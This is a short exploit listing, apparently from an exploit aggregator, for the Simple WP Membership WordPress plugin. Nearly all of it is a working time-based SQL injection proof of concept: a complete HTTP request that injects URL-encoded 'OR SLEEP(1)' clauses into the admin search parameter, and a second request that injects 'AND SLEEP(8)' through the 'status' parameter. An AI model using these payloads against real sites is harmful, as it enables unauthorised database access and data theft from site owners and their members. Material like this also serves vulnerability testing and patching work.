Share
## https://sploitus.com/exploit?id=WPEX-ID:3B85C656-07B3-453F-8864-53596C360926
GET /wp/wp-admin/admin.php?status=&membership_level=&s=hhhh%27%20OR%20SLEEP%281%29%20OR%20first_name%20LIKE%20%27%25i%0A&page=simple_wp_membership HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/admin.php?page=simple_wp_membership
Connection: keep-alive
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

In addition to the 's' parameter, the 'status' parameter is similarly vulnerable:

GET /wp/wp-admin/admin.php?status=active%27%20AND%20SLEEP%288%29%20AND%20%27a%27%3D%27a&membership_level=&s=&page=simple_wp_membership